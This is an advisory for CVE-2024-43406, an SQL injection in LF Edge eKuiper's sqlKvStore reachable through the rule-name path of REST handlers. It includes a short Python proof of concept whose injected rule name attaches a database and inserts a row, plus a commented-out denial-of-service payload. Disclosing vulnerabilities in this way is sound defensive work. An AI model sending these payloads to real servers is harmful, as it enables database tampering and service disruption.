CVE-2024-43406 – ekuiper
Package
Manager: pip
Name: ekuiper
Vulnerable Version: >=0 <1.14.2
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.0061 pctl0.6882
Details
LF Edge eKuiper has a SQL Injection in sqlKvStore

### Summary

A user could exploit SQL injection to execute a malicious SQL query via the Get method in sqlKvStore.

### Details

I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.

The SQL injection can happen in the code:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93

The code that accepts user input is:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277

The rule id in the above code can be used to inject into the SQL query. Note that the delete function is also vulnerable:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141

### PoC

```python
import requests
from urllib.parse import quote

# SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
#payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain"  # explainRuleHandler
res = requests.get(url)
print(res.content)
```

The screenshot shows the malicious SQL query to insert a value:

The screenshot shows the breakpoint of executing the query:

### Impact

SQL Injection vulnerability

The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
Metadata
Created: 2024-08-20T20:04:31Z
Modified: 2024-08-27T14:27:18Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-r5ph-4jxm-6j9p/GHSA-r5ph-4jxm-6j9p.json
CWE IDs: ["CWE-89"]
Alternative ID: GHSA-r5ph-4jxm-6j9p
Finding: F297
Auto approve: 1